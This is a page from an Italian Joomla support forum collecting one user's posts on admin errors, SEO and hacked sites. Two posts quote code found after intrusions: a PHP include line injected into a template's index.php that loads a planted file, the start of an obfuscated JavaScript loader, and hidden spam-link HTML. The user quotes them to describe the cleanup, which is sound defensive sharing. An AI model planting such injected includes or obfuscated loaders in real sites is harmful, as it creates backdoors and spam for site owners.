Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Post - davide73

Pagine: 1 [2] 3 4 5 6
21
Ciao a tutti.


in Joomla 2.5.11 in amministrazione da gestione Plugin, appena clicco su un Plugin qualunque ottengo questo errore:


500 - Si verificato un errore.

[/size]Layout edit_options non trovato
[/size]
[/size]ho attivato il Debug mi porta i seguenti errori:

Call stack
#   Function   Location
1   JAdministrator->dispatch()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/index.php:46
2   JComponentHelper::renderComponent()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/includes/application.php:153
3   JComponentHelper::executeComponent()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/helper.php:351
4   require_once()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/helper.php:383
5   JController->execute()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/components/com_plugins/plugins.php:18
6   PluginsController->display()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/controller.php:761
7   JController->display()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/components/com_plugins/controller.php:48
8   PluginsViewPlugin->display()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/controller.php:722
9   JView->display()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/components/com_plugins/views/plugin/view.html.php:38
10   JView->loadTemplate()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/view.php:205
11   include()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/view.php:649
12   JView->loadTemplate()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/components/com_plugins/views/plugin/tmpl/edit.php:77
13   JError::raiseError()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/view.php:660
14   JError::raise()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/error/error.php:251


il sito su ... non lo posso dire vero?
comunque installato di fresco e ho installato un template che lavora con un Framework JA T3 in versione 2.5.1


avete un aiuto da darmi?


grazie ....

22
Joomla! 1.5 / Re:La 1.5.26 sicura?
« il: 26 Mag 2013, 14:12:31 »
Ciao,


molto gentili faccio tesoro e applico i vostri consigli!!  ;D


inoltre ho chiesto lumi anche al Provider per vedere se lato Server esistono problemi ...


qualora dovessi capire realmente da dove sono entrati lo posto per conoscenza agli altri.


Saluti e buona domenica a tutti.


Davide.

23
Joomla! 1.5 / La 1.5.26 sicura?
« il: 23 Mag 2013, 13:48:51 »
Ciao,

ho un sito con la 1.5.26 con all'interno i seguenti moduli e componenti di terza parte:

Communicator 2.0.4
JoomFish 2.2.3

mod_AutsonSlideShow 1.2
communicatorsubscribe 2.0.3
jv_facebook 1.5.3
mod_jw_sir 1.2

il tutto su un Template a pagamento di una azienda americana di cui non scrivo il nome (mi pare che qui non si possano nominare cose a pagamento), ma regolarmente acquistato e con la quale ho molti siti con le loro template.

di fatto all'interno degli articoli (pagine) ho rilevato il seguente codice:
ne posto solo l'inizio:

<div id="J#1368173419bl389795a1"><p>Возможна причина в том, что я слишком мало уделял внимания изучению этой темы.</p><p>И она решила в конце концов, что для тебя будет лучше пожить с монахинями.</p><p>Он начал двигаться в противоположную от лагеря сторону, направляясь на восток, параллельно горному хребту, возле которого я работал.</p><p>Добрый вечер, сдержанно &quot;<a href='#' title='нефорспит игра скачать'>Нефорспит игра скачать[/url]</div><script type="text/javascript"> document.getElementById("J#1368173419bl389795a1").style.display = "none";</script>

ho oscurato il link con # e questa solo mezza riga, ma certamente il codice che ho trovato molto pi lungo.

la domanda : da dove sono entrati?

mi risulta che Joomla 1.5.26 sia stabile pertanto penso che la strada sia da uno dei moduli componenti sopra citati, voi che ne pensate?

resto in attesa, di certo ho ripulito il sito, ma prima di eliminare componenti o moduli volevo il parere di uno esperto.

24
Ciao,
 
ho la template di rikettheme Quasar (ma anche con altre della stessa produzione) e il plugin per facebook, twitter fb_tw_plus1  http://extensions.joomla.org/extensions/social-web/republish/18072 e i social insomma, che funziona bene su tutti i browser meno che su IE7 (non so su altre versioni se va) che potrebbe essere?
 
qualcuno ci ha gi sbattuto ha una dritta?
 
grazie come sempre.
 
Buona giornata ragazzi e ragazze.

25
Cosi da ignorante:

se ottieni un errore 500 vuol dire che su tuo isp qualcosa ne blocca la installazione.

Prima cosa che farei, un tiket ....

per installare manualmente un componente ne devi seguire la sua logica, cosa abbastanza facile leggendo il file XML incluso nel pacche di installazione, e sicuramente dovrai anche fare un intervento per creare le tabelle sul tuo data base

alla fine se non hai pratica, meglio chiedere al tuo provider spiegazioni.

Ciao

26
SEO / Re:Google news + XMAP + Nome di pubblicazione
« il: 14 Nov 2010, 14:26:12 »
A seguito di varie ricerche ho trovato il giusto link, che ne qui ne sul forum di google mi hanno segnalato pertanto lo segnalo:

link al modulo per le richieste di variazione al proprio sito come il titolo o anche l'URL e che vanno segnalati all'assistenza:

http://www.google.it/support/news_pub/bin/request.py?contact_type=report_update&hl=it

Ringrazio: http://www.dd2006.net

27
SEO / Re:Google news + XMAP + Nome di pubblicazione
« il: 10 Nov 2010, 20:04:42 »
ho riproposto questa domanda sui forum di Google cosi vedo se si riesce a fare qualcosa.

In giro non riesco a trovare nulla su la scritta BLOG e come si toglie da google news.

aggiorno anche qui se scopro come ......

28
Sicurezza / Re:Sito bucato?
« il: 09 Nov 2010, 22:37:07 »
Ringraziando M. per l'attenzione e il post scritto, a seguire la mia esperienza che magari serva a qualcuno:

innanzitutto, non so come sono entrati, probabilmente la versione non aggiornata del core, quindi importante aggiornare (me lo dico ovviamente anche da solo).

Verificare eventuali aggiornamenti dei moduli e componenti e plugin etc installati.

Anche se poi magari per colpa del mio ISP che non nomino per ovvie ragioni.

Comunque:

1. hanno inserito uno script che richiamava un modulo sempre da loro inserito nel file INDEX.PHP della template in uso.

Ovviamente tale richiamo v eliminato, nel mio caso visto che comunque con attenzione mantengo un backup dei file e del DB in locale, stato veole rimettere il MIO file originale.

V comunque letto ed intepretato lo script per capire cosa fa, in questo caso stato facile:

<?php @include_once("./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."/modules/com_k2/copy_right.php");?>

dove chiaramente bisogna seguire e leggere il file copy_right.php e quindi da questo vedere cosa ealtro implicato.

Inoltre c'era questo strano script nelle prime righe tra i tag <head>:

ne scrivo solo l'inizio:
type="text/javascript"> <!--         $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"        \\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"_"+(![]+"")[$._$_]+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.$$_+$._$$+" \\"+$.$$$+$.$_$+" []\\"+$.$$$+$._$$+"\\"+$.__$+$._$_+"        "+$.$$$$+$._+"\\"+$.__$+$.$_$+$.$$_+$.$$__+$.__+"\\"+$.__$+$.$_$+$.__$+$._$+"\\"+$.__$+$.$_$+$.$$_+" \\"+$.__$+$.$$_+$._$$+$.$$$_+$.__+"\\"+$.__$+$.___+$.$$$+(![]+"")[$._$_]+$._$+$.$_$$+$.$_$_+(![]+"")[$._$  etc.

2. erano state inserite 2 cartelle nella cartella modules: com_comprofiles e mod_k2

ovviamente ho rimosso tutto il loro contenuto dal server, cosi che non ho pi gli strani link tra le mie pagine.

Sicuramente l'unico scopo e di tipo SEO al fine che gli si indicizzino link sfruttando il tuo sito, considerate che all'interno delle funzioni calcolato che vengano presi 244 caratteri (circa 20 link) alla volta da un file di testo txt che pesava oltre 5mb, il ch significa: una enormit di link!! e che io nelle pagine del sito non li vedevo e tanto meno nel pannello.

Adesso ho reinviato la sitemap a Google sperando che cancelli quanto prima le indicizzaioni fatte a quei link INVADENTI ripulendo la mia chache, lo faro anche su Yahoo, Ask e Bing che sono i motori che mi risultano pi intelligenti e con gli strumenti per farlo! se conoscete altri motori con attenzione ai webmaster ditemeli che ci passo!!

Me ne sono accorto grazie al comando site:www.xxxx.com da google che mi porta oltre 500 link su un sito di 30/40 pagine, strano no??

Spero che questo post sia di aiuto, mentre invito il moderatore qual'ora io abbia commesso un abuso ho abbia sbagliato inserendo script e dettagli di cancellarlo o avvisarmi che lo cancello.

Saluti e meno male che me andata bene sta volta v ........

29
Sicurezza / Sito bucato?
« il: 09 Nov 2010, 10:09:16 »
Ciao,

facendo una analisi su google ho scoperto che nell'indice compaiono pagine non inerenti al sito, che hanno link del tipo a seguire:

modules/com_comprofiler/fruit-of-the-loom-tees-p-943.html

adesso per accedendo al back-end non vendo nulla di strano ed il sito fnziona comunque correttamente "apparentemente"

la versione e vecchia: 1.5.12

ed installato oltre a joomla c' Frontpage SlideShow e Joomap

dove e come posso eliminare l'errore, oltre ovviamente ad aggiornare la mia versione del core?

da dove sono entrati che io non uso comunity builder?

saluti e grazie delle risposte. Davide.

30
SEO / Google news + XMAP + Nome di pubblicazione
« il: 02 Nov 2010, 00:41:21 »
Ciao a tutti,

ho 2 piccoli quesiti:

1. ricevo errore da google news sulla sitemap generata con XMAP:

Errore: "Nome di pubblicazione non previsto"
ho letto che trattasi del campo N:NAME che in effetti non mi corrisponde al nome con il quale il sito registrato su google news, come si cambia questo parametro con XMAP ?

2. su google news vengo scritto come: Nome Sito (Blog)

come diavolo si f per cancellare quella scritta blog tra parentesi (Blog) ??

Visto che non si tratta di un blog ma di un sito di informazione la dicitura che google news mi ha addossato di suo mi penalizza e vengo sicuramente meno cliccato.

Rester in attesa del vostro cortese aiuto e saluto tutti!!!.

Davide

31
SEO / Re:Url amichevoli e pure google msn yahoo
« il: 12 Lug 2010, 14:14:04 »
Insomma si vince soltanto su Google?

32
SEO / Re:Url amichevoli e pure google msn yahoo
« il: 09 Lug 2010, 11:15:23 »
Grazie per l'attenzione.

certo fin qui ok ma alla fine la domanda interessante era:

inserisco la mappa in 3 motori msn yahoo e google, soltanto google la premia: perch?

nei confronto di nsn (bing) e yahoo che caspita bisogna fare affinch portino qualche visita?

33
SEO / Re:Url amichevoli e pure google msn yahoo
« il: 03 Lug 2010, 02:35:57 »
Caspita raga di due quesiti neanche una drtta!!??

ciao :D

34
Ciao,

considera ch anzi tutto  devi verificare che il tuo server sia linux e di avede almeno un db mysql per essere in linea con quanto necessario all'uso di joomla.

Detto questo il server prevede che vengano laciati in sequenza i seguenti file:
index.html (molto probabilmente il tuo file attuale)
index.php (il file che lancia joomla)

quindi puoi caricare e installare joomla che comunque non sarebbe visibile affinch esiste il file index.html.

Altra e ultima considerazione per il momento:
dovrai fare anche attenzione a che non ti si mischino file joomla con i tuoi attuali ad es. (quelle pi comuni) la cartella css e la cartella images.

Altra soluzione pu essere quella di installare il sito by joomla in una sottocartella del tuo server che verr raggiunta tipo mioweb.it/mia-cartella-joomla quando sar pronto con una piccola modifica la file htacess (che inserirai nella root) reidirizzi miosito.it verso la cartella di joomla.

Ciao!

35
SEO / Re:Title nelle voci di menu
« il: 26 Giu 2010, 23:16:58 »
m.davide hi hi io sono davide .........

tolto la omonimia se ho ben capito devi agire facilmente cosi:

nuova voce menu > aspetto articolo (o quello che ti serve ovviamente) > nel menu lato destro:

parametri sistema > titolo pagina !

cio che li scrivi diventa il tag title, puoi anche scegliere se il titolo lo vuoi a vista nella pagina o no.

Spero che avevo ben intuito cosa chiedevi ...

ciao Davide!!!!!

36
SEO / Re:traking Bing
« il: 26 Giu 2010, 23:09:29 »
Personalmente non trovo favorevole l'utilizzo delle exstension moduli plugin etc. a me che mi piace avere JOOMLA quanto pi sobrio possibile per mille ragioni, per autenticare gli account aggiungo semplicemente il file sul server e sono sempre okay!.

Google yahoo e msn prevedono o il tag oppure un file di 1k per l'autenticazione.

Ciao!

37
SEO / Re:metadata e keyword (ma servono davvero?)
« il: 26 Giu 2010, 23:03:13 »
Io penso e dichiaro che la moggior parte dei motori oramai prepara a effettuare scansione direttamente da quello che il <body> corpo pagina ma in molti casi una corretta compilazione dei meta aiuta:

anzi tutto la description come noto e anche visibile agli utenti nelle liste dei motori pertanto generarne uno differente per ogni pagina aiuta i termini fondamentali a salire e imboccare le parole chiavi desiderate con il tag keywords aumenta la possibilit di alzarle ulteriormente.

Tutto provato sulle mie indicizzaioni, dove non ho curato questi piccoli particolari ho preso meno di dove invece ho "perso" un po di tempo.

Fondamentale di certo il tag TITLE che secondo mio avviso il principale riferimento per le indicizzazioni in generale, ovviamente meno script possibili, pagine pulite tag chiusi regolamente contenuti decrittivi inteligenti e via dicendo .... un buon sito prende sempre pi piede di un sito dove non c' dedizione e attenzione.

Saluti cari a tutti!

38
SEO / Url amichevoli e pure google msn yahoo
« il: 26 Giu 2010, 19:02:15 »
Ciao a tutti,

facile che i miei siano argomenti stupidi e triti e mi scuso anticipatamente.

1. friendly url componente base di joomla:

a parte che a me sembra sufficiente per ottenere una lettura facile della path ma mi domando come ragiona:
se inserisco un link in un menu il nomefile.html corrisponde esattamente a alias della voce di menu stessa ... fantastico

ma quando essi sono frutto dell'inserimento di un articolo in una categoria che poi linko come aspetto categoria diventano ad es. /nome-categoria/98/nome-del-alias-utente.html
 altre volte diventano: nome-categoria/nome-o-titolo-articolo.html
come si f a fare in modo che siano sempre nome articolo.html ??

grazie ragazzi ....

Google Msn e Yahoo

allora provo ad andare per vie veloci (forse servivano 2 post?!)

sono iscritto a tutti e tre o servizi per webmaster previsti dai motori, a tutti e tre invio mappe etc. ma solo google mi felicita .....

1. i componenti come joomap che generano la sitemap xml per google, quando lo stesso file lo invio anche a gli altri: PENALIZZA ?? o va bene comunque?

2. come diavolo che google mi indicizza e magari mi posiziona buone parole in cima e gli altri 2 mi vedono pochissimo e pur uscendo vengo sempre fuori "male"??

che se deve fare per avere consenso da msn (bing) e il network di yahoo?

grazie mille se vorrete togliermi qualche ? ...

Saluti Davide Roma.

39
Caspista che scemo che sono, ho risposto a getto senza accorgermi che questa sezione dedicata a joomla 1.0.x!!!! sono un cretino!!

quindi: 1 e valida la spiegazione gi postata ed altrettanto valido anche il consiglio espresso per la 1.5.x poich quando crei un collegamento ed inserisci a manina la url da collegare non hai mai problemi.

Saluti e facci sapere!

Ciao

40
Ciao,

io vedo che:

apro la seguente pagina:

http://www.hotelgardaseeitalien.de/Hotel-Gardasee-Bardolino/hotel-ca-mura-hotelgardaseeitalien.html

la prima foto in alto corrisonde alla url:
http://www.hotelgardaseeitalien.de/Hotel-Gardasee-Bardolino/images/stories/alberghi/bardolino/hotel-ca-mura/hotel1.jpg

mentre dovrebbe essere:

http://www.hotelgardaseeitalien.de/images/stories/alberghi/bardolino/hotel-ca-mura/hotel1.jpg

quindi il problema e relativo alle url, probabilmente utilizzi un modulo per le url friendly che non correttamente configurato.

Prova a disabilitarlo e vedi se va, quindi intervieni su quello, altrimenti scrivi.

Spero di essere stato di aiuto, poi se qualcuno con pi pratica vede proprio dov' il problema che scriva!!!

ciao!!!!!!

CRIBIO!! come dice quello l! ;)

Pagine: 1 [2] 3 4 5 6
Host

Torna su